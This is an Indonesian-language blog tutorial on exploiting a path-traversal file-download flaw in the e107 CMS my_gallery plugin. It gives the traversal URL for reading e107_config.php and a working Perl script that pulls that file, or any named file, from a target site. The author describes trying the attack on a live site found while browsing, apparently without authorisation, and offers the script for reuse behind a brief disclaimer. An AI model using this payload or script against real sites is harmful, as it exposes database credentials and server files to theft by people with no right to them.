Disclaimer
Tutorial ini hanya untuk tujuan pembelajaran semata. Penulis tidak bertanggungjawab atas penggunaan maupun penyalahgunaan tutorial ini. Use at your own risk.


Ilustrasi
Awalnya saya ingin membuat tutorial tentang javascript, namun entah mengapa tiba-tiba muncul keinginan untuk mencari hal yang menarik. Akhirnya saya coba browsing ke sana kemari hingga tiba di salah satu situs yang cukup menarik karena menggunakan e107. Dan setelah saya perhatikan sebentar, ternyata situs tersebut terdapat plugin my_gallery. Karena penasaran, saya coba mencari vulnerabilities e107 di milw0rm, dan kebetulan ketemu vulnerabilities untuk plugin tersebut, seperti pada gambar berikut ini:





Ternyata plugin tersebut memungkinkan local file download hmmm… menarik. Ok, akhirnya saya mendownload e107 untuk mencari tahu apa saja file-file penting pada e107. Setelah diekstrak, saya lihat ada file e107_config.php dan ternyata file tersebut kosong. Dari situ saya mengambil kesimpulan sementara bahwa file tersebut akan diisi oleh e107 pada saat instalasi:





Selain hal tersebut, saya juga memperhatikan bahwa di sana ada file class2.php dan ternyata setelah diperhatikan secara seksama dalam tempo yang sesingkat-singkatnya ternyata benar, file e107_config.php akan diisi oleh e107 ketika instalasi berlangsung:





Sekarang, saya kembali ke browser untuk mencoba apakah jurusnya ampuh dan ternyata benar. File konfigurasi e107 bisa diakses pada path ../../e107_config.php jadi, bentuk url selengkapnya seperti ini:

http://www.target.com/e107_plugins/my_gallery/dload.php?file=../../e107_config.php

Contohnya seperti ini:





Nah, daripada menggunakan browser, bagaimana jika kita membuat script sederhana untuk memudahkan proses ini . Jadi script ini akan menerima 2 parameter dimana parameter terakhir sifatnya optional yaitu nama file pada target yang ingin dilihat. Jika parameter tersebut kosong, maka akan mencoba membuka file configurasi e107. Nah, berikut ini snippetnya dalam bahasa perl (maaf kodenya kacau maklum saya bukan programmer):

#!/usr/bin/perl

use LWP::UserAgent;

die("[i] aturan pakai: e107conf.pl <website> [file]\n") unless @ARGV > 0;
$ua = LWP::UserAgent->new;
$fx = ($ARGV[1] eq '') ? "../../e107_config.php" : $ARGV[1];
$ex = $ua->request(HTTP::Request->new(GET => "http://".$ARGV[0]."/e107_plugins/my_gallery/dload.php?file=".$fx));

if ($ex->is_success) { print "[+] web: ".$ARGV[0]."\n".$ex->content."\n"; }

Nah, berikut ini 2 screenshot ketika script ini bekerja dimana pada screenshot pertama kita hanya memberikan alamat website yang ingin dieksploitasi, sedangkan pada screenshot ke-2 kita memberikan parameter ke-2 yaitu nama file yang ingin dilihat










Penutup
Sekian dulu tutorial sederhana dari saya, semoga bisa bermanfaat untuk Anda. Sampai jumpa di tutorial berikutnya


Ucapan Terima Kasih
Tanpa Urutan: Tuhan Yang Maha Esa, NitrouZ, pinczakko, hddstudio, dylavig, LiFe, LucuBRB, 4NV|e, movzx, k0il, semua rekan-rekan yang tidak sempat saya sebutkan satu-satu di sini (you know who you are) dan Anda yang telah membaca tutorial ini… (terima kasih telah membaca tutorial ini)…

• LFI Di Situs Michael Heart
• Mikrotik Script Maker [KotjokDjaja Team]
• Copy to clipboard using JavaScript